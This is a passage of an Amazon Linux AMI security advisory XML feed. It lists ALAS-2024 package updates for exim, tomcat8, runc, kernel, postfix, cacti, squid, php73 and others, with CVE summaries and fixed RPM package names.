</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5388" title="" id="CVE-2023-5388" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nss-softokn-debuginfo" version="3.53.1" release="6.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-debuginfo-3.53.1-6.49.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.53.1" release="6.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-devel-3.53.1-6.49.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-devel" version="3.53.1" release="6.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-devel-3.53.1-6.49.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl" version="3.53.1" release="6.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-freebl-3.53.1-6.49.amzn1.x86_64.rpm</filename></package><package name="nss-softokn" version="3.53.1" release="6.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/nss-softokn-3.53.1-6.49.amzn1.x86_64.rpm</filename></package><package name="nss-softokn-freebl-devel" version="3.53.1" release="6.49.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-devel-3.53.1-6.49.amzn1.i686.rpm</filename></package><package name="nss-softokn-freebl" version="3.53.1" release="6.49.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-freebl-3.53.1-6.49.amzn1.i686.rpm</filename></package><package name="nss-softokn-devel" version="3.53.1" release="6.49.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-devel-3.53.1-6.49.amzn1.i686.rpm</filename></package><package name="nss-softokn-debuginfo" version="3.53.1" release="6.49.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-debuginfo-3.53.1-6.49.amzn1.i686.rpm</filename></package><package name="nss-softokn" version="3.53.1" release="6.49.amzn1" epoch="0" arch="i686"><filename>Packages/nss-softokn-3.53.1-6.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1908</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1908: important priority package update for exim</title><issued date="2024-01-19 01:19:00" /><updated date="2024-01-23 18:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-51766:
Exim through 4.97 allows SMTP smuggling in certain configurations. Remote attackers can use a published exploitation technique to inject e-mail messages with a spoofed MAIL FROM address, allowing bypass of an SPF protection mechanism. This occurs because Exim supports <LF>.<CR><LF> but some other popular e-mail servers do not.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51766" title="" id="CVE-2023-51766" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="exim-mysql" version="4.92" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mysql-4.92-1.40.amzn1.x86_64.rpm</filename></package><package name="exim-mon" version="4.92" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-mon-4.92-1.40.amzn1.x86_64.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-pgsql-4.92-1.40.amzn1.x86_64.rpm</filename></package><package name="exim" version="4.92" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-4.92-1.40.amzn1.x86_64.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-debuginfo-4.92-1.40.amzn1.x86_64.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/exim-greylist-4.92-1.40.amzn1.x86_64.rpm</filename></package><package name="exim-mysql" version="4.92" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mysql-4.92-1.40.amzn1.i686.rpm</filename></package><package name="exim-pgsql" version="4.92" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/exim-pgsql-4.92-1.40.amzn1.i686.rpm</filename></package><package name="exim-greylist" version="4.92" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/exim-greylist-4.92-1.40.amzn1.i686.rpm</filename></package><package name="exim" version="4.92" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/exim-4.92-1.40.amzn1.i686.rpm</filename></package><package name="exim-mon" version="4.92" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/exim-mon-4.92-1.40.amzn1.i686.rpm</filename></package><package name="exim-debuginfo" version="4.92" release="1.40.amzn1" epoch="0" arch="i686"><filename>Packages/exim-debuginfo-4.92-1.40.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1909</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1909: medium priority package update for tomcat8</title><issued date="2024-01-19 01:19:00" /><updated date="2024-01-23 18:19:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-46589:
Improper Input Validation vulnerability in Apache Tomcat.Tomcat from 11.0.0-M1 through 11.0.0-M10, from 10.1.0-M1 through 10.1.15, from 9.0.0-M1 through 9.0.82 and from 8.5.0 through 8.5.95 did not correctly parse HTTP trailer headers. A trailer header that exceeded the header size limit could cause Tomcat to treat a single
request as multiple requests leading to the possibility of request
smuggling when behind a reverse proxy.
Users are recommended to upgrade to version 11.0.0-M11 onwards, 10.1.16 onwards, 9.0.83 onwards or 8.5.96 onwards, which fix the issue.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46589" title="" id="CVE-2023-46589" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8" version="8.5.96" release="1.96.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.96-1.96.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.96" release="1.96.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.96-1.96.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.96" release="1.96.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.96-1.96.amzn1.noarch.rpm</filename></package><package name="tomcat8-servlet-3.1-api" version="8.5.96" release="1.96.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.96-1.96.amzn1.noarch.rpm</filename></package><package name="tomcat8-log4j" version="8.5.96" release="1.96.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.96-1.96.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.96" release="1.96.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.96-1.96.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.96" release="1.96.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.96-1.96.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.96" release="1.96.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.96-1.96.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.96" release="1.96.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.96-1.96.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.96" release="1.96.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.96-1.96.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1910</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1910: important priority package update for apache-ivy</title><issued date="2024-01-19 01:19:00" /><updated date="2024-01-23 18:19:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-37866:
When Apache Ivy downloads artifacts from a repository it stores them in the local file system based on a user-supplied "pattern" that may include placeholders for artifacts coordinates like the organisation, module or version. If said coordinates contain "../" sequences - which are valid characters for Ivy coordinates in general - it is possible the artifacts are stored outside of Ivy's local cache or repository or can overwrite different artifacts inside of the local cache. In order to exploit this vulnerability an attacker needs collaboration by the remote repository as Ivy will issue http requests containing ".." sequences and a "normal" repository will not interpret them as part of the artifact coordinates. Users of Apache Ivy 2.0.0 to 2.5.1 should upgrade to Ivy 2.5.1.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37866" title="" id="CVE-2022-37866" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="apache-ivy" version="2.2.0" release="5.3.amzn1" epoch="0" arch="noarch"><filename>Packages/apache-ivy-2.2.0-5.3.amzn1.noarch.rpm</filename></package><package name="apache-ivy-javadoc" version="2.2.0" release="5.3.amzn1" epoch="0" arch="noarch"><filename>Packages/apache-ivy-javadoc-2.2.0-5.3.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1911</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1911: important priority package update for runc</title><issued date="2024-01-25 19:21:00" /><updated date="2024-01-31 23:35:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-21626:
AWS is aware of CVE-2024-21626, an issue affecting the runc component of several open source container management systems. Under certain conditions, an actor could leverage a specially crafted container or container configuration to access files or directories outside the container's file system namespace.
An updated version of runc that addresses the issue is available for Amazon Linux 1 (runc-1.1.11-1.0.amzn1), Amazon Linux 2 (runc-1.1.11-1.amzn2) and for Amazon Linux 2023 (runc-1.1.11-1.amzn2023). AWS recommends that customers using runc or any container-related software apply those updates or a newer version.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21626" title="" id="CVE-2024-21626" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="runc" version="1.1.11" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/runc-1.1.11-1.1.amzn1.x86_64.rpm</filename></package><package name="runc-debuginfo" version="1.1.11" release="1.1.amzn1" epoch="0" arch="x86_64"><filename>Packages/runc-debuginfo-1.1.11-1.1.amzn1.x86_64.rpm</filename></package><package name="runc" version="1.1.11" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/runc-1.1.11-1.1.amzn1.i686.rpm</filename></package><package name="runc-debuginfo" version="1.1.11" release="1.1.amzn1" epoch="0" arch="i686"><filename>Packages/runc-debuginfo-1.1.11-1.1.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1912</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1912: important priority package update for kernel</title><issued date="2024-02-01 19:33:00" /><updated date="2024-02-01 19:33:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-6931:
A heap out-of-bounds write vulnerability in the Linux kernel's Performance Events system component can be exploited to achieve local privilege escalation.
A perf_event's read_size can overflow, leading to an heap out-of-bounds increment or write in perf_read_group().
We recommend upgrading past commit 382c27f4ed28f803b1f1473ac2d8db0afc795a1b.
CVE-2023-6040:
An out-of-bounds access vulnerability involving netfilter was reported and fixed as: f1082dd31fe4 (netfilter: nf_tables: Reject tables of unsupported family); While creating a new netfilter table, lack of a safeguard against invalid nf_tables family (pf) values within `nf_tables_newtable` function enables an attacker to achieve out-of-bounds access.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6040" title="" id="CVE-2023-6040" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6931" title="" id="CVE-2023-6931" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.14.336" release="179.557.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.336-179.557.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.336" release="179.557.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.336-179.557.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.336" release="179.557.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.336-179.557.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.336" release="179.557.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.336-179.557.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.336" release="179.557.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.336-179.557.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.336" release="179.557.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.336-179.557.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.336" release="179.557.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.336-179.557.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.336" release="179.557.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.336-179.557.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.336" release="179.557.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.336-179.557.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.336" release="179.557.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.336-179.557.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.336" release="179.557.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.336-179.557.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.336" release="179.557.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.336-179.557.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.336" release="179.557.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.336-179.557.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.336" release="179.557.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.336-179.557.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.336" release="179.557.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.336-179.557.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.336" release="179.557.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.336-179.557.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.336" release="179.557.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.336-179.557.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.336" release="179.557.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.336-179.557.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.336" release="179.557.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.336-179.557.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.336" release="179.557.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.336-179.557.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1913</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1913: important priority package update for libtiff</title><issued date="2024-02-01 19:33:00" /><updated date="2024-02-01 19:33:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-6277:
An out-of-memory flaw was found in libtiff. Passing a crafted tiff file to TIFFOpen() API may allow a remote attacker to cause a denial of service via a craft input with size smaller than 379 KB.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6277" title="" id="CVE-2023-6277" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-devel" version="4.0.3" release="35.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-35.50.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-35.50.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-35.50.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-35.50.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.50.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-35.50.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.50.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-35.50.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.50.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-35.50.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.50.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-35.50.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1914</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1914: important priority package update for postfix</title><issued date="2024-02-01 19:33:00" /><updated date="2024-02-01 19:33:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-51764:
Postfix through 3.8.4 allows SMTP smuggling unless configured with smtpd_data_restrictions=reject_unauth_pipelining and smtpd_discard_ehlo_keywords=chunking (or certain other options that exist in recent versions). Remote attackers can use a published exploitation technique to inject e-mail messages with a spoofed MAIL FROM address, allowing bypass of an SPF protection mechanism. This occurs because Postfix supports <LF>.<CR><LF> but some other popular e-mail servers do not. To prevent attack variants (by always disallowing <LF> without <CR>), a different solution is required: the smtpd_forbid_bare_newline=yes option with a Postfix minimum version of 3.5.23, 3.6.13, 3.7.9, 3.8.4, or 3.9.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51764" title="" id="CVE-2023-51764" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postfix" version="2.6.6" release="2.17.amzn1" epoch="2" arch="x86_64"><filename>Packages/postfix-2.6.6-2.17.amzn1.x86_64.rpm</filename></package><package name="postfix-debuginfo" version="2.6.6" release="2.17.amzn1" epoch="2" arch="x86_64"><filename>Packages/postfix-debuginfo-2.6.6-2.17.amzn1.x86_64.rpm</filename></package><package name="postfix-perl-scripts" version="2.6.6" release="2.17.amzn1" epoch="2" arch="x86_64"><filename>Packages/postfix-perl-scripts-2.6.6-2.17.amzn1.x86_64.rpm</filename></package><package name="postfix-debuginfo" version="2.6.6" release="2.17.amzn1" epoch="2" arch="i686"><filename>Packages/postfix-debuginfo-2.6.6-2.17.amzn1.i686.rpm</filename></package><package name="postfix" version="2.6.6" release="2.17.amzn1" epoch="2" arch="i686"><filename>Packages/postfix-2.6.6-2.17.amzn1.i686.rpm</filename></package><package name="postfix-perl-scripts" version="2.6.6" release="2.17.amzn1" epoch="2" arch="i686"><filename>Packages/postfix-perl-scripts-2.6.6-2.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1915</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1915: important priority package update for cacti</title><issued date="2024-02-01 19:33:00" /><updated date="2024-02-01 19:33:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-51448:
Cacti provides an operational monitoring and fault management framework. Version 1.2.25 has a Blind SQL Injection (SQLi) vulnerability within the SNMP Notification Receivers feature in the file `'managers.php'`. An authenticated attacker with the "Settings/Utilities" permission can send a crafted HTTP GET request to the endpoint `'/cacti/managers.php'` with an SQLi payload in the `'selected_graphs_array'` HTTP GET parameter. As of time of publication, no patched versions exist.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51448" title="" id="CVE-2023-51448" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="1.1.19" release="6.24.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-1.1.19-6.24.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1916</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1916: important priority package update for squid</title><issued date="2024-02-01 19:33:00" /><updated date="2024-02-01 19:33:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-50269:
Squid is a caching proxy for the Web. Due to an Uncontrolled Recursion bug in versions 2.6 through 2.7.STABLE9, versions 3.1 through 5.9, and versions 6.0.1 through 6.5, Squid may be vulnerable to a Denial of Service attack against HTTP Request parsing. This problem allows a remote client to perform Denial of Service attack by sending a large X-Forwarded-For header when the follow_x_forwarded_for feature is configured. This bug is fixed by Squid version 6.6. In addition, patches addressing this problem for the stable releases can be found in Squid's patch archives.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50269" title="" id="CVE-2023-50269" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid" version="3.5.20" release="17.54.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-17.54.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.54.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-17.54.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.54.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-17.54.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.54.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-17.54.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.54.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-17.54.amzn1.i686.rpm</filename></package><package name="squid" version="3.5.20" release="17.54.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-17.54.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1917</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1917: low priority package update for sudo</title><issued date="2024-02-01 19:33:00" /><updated date="2024-02-28 23:54:00" /><severity>low</severity><description /><references /><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="sudo" version="1.8.23" release="10.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-1.8.23-10.58.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.23" release="10.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-debuginfo-1.8.23-10.58.amzn1.x86_64.rpm</filename></package><package name="sudo-devel" version="1.8.23" release="10.58.amzn1" epoch="0" arch="x86_64"><filename>Packages/sudo-devel-1.8.23-10.58.amzn1.x86_64.rpm</filename></package><package name="sudo-debuginfo" version="1.8.23" release="10.58.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-debuginfo-1.8.23-10.58.amzn1.i686.rpm</filename></package><package name="sudo-devel" version="1.8.23" release="10.58.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-devel-1.8.23-10.58.amzn1.i686.rpm</filename></package><package name="sudo" version="1.8.23" release="10.58.amzn1" epoch="0" arch="i686"><filename>Packages/sudo-1.8.23-10.58.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2024-1918</id><title>Amazon Linux AMI 2014.03 - ALAS-2024-1918: important priority package update for php73</title><issued date="2024-02-01 19:33:00" /><updated date="2024-02-14 20:03:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-18218:
cdf_read_property_info in cdf.c in file through 5.37 does not restrict the number of CDF_VECTOR elements, which allows a heap-based buffer overflow (4-byte out-of-bounds write).
CVE-2019-11050:
When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0 it is possible to supply it with data what will cause it to read past the allocated buffer. This may lead to information disclosure or crash.
CVE-2019-11049:
In PHP versions 7.3.x below 7.3.13 and 7.4.0 on Windows, when supplying custom headers to mail() function, due to mistake introduced in commit 78f4b4a2dcf92ddbccea1bb95f8390a18ac3342e, if the header is supplied in lowercase, this can result in double-freeing certain memory locations.
CVE-2019-11047:
When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0 it is possible to supply it with data what will cause it to read past the allocated buffer. This may lead to information disclosure or crash.
CVE-2019-11046:
In PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0, PHP bcmath extension functions on some systems, including Windows, can be tricked into reading beyond the allocated space by supplying it with string containing characters that are identified as numeric by the OS but aren't ASCII numbers. This can read to disclosure of the content of some memory locations.
CVE-2019-11045:
In PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0, PHP DirectoryIterator class accepts filenames with embedded \0 byte and treats them as terminating at that byte. This could lead to security vulnerabilities, e.g. in applications checking paths that the code is allowed to access.
CVE-2019-11044:
A flaw was discovered in the link function in PHP. When compiled on Windows, it does not correctly handle paths containing NULL bytes. An attacker could abuse this flaw to bypass application checks on file paths.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11044" title="" id="CVE-2019-11044" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11045" title="" id="CVE-2019-11045" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11046" title="" id="CVE-2019-11046" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11047" title="" id="CVE-2019-11047" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11049" title="" id="CVE-2019-11049" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11050" title="" id="CVE-2019-11050" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18218" title="" id="CVE-2019-18218" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php73-pdo" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-soap" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-mbstring" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mbstring-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-imap-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-recode-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-bcmath" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-dbg" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.13" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.13-1.22.amzn1.x86_64.rpm</filename></package><package name="php73-gmp" version="7.3.13" release="1.22.amzn1" epoch="0" 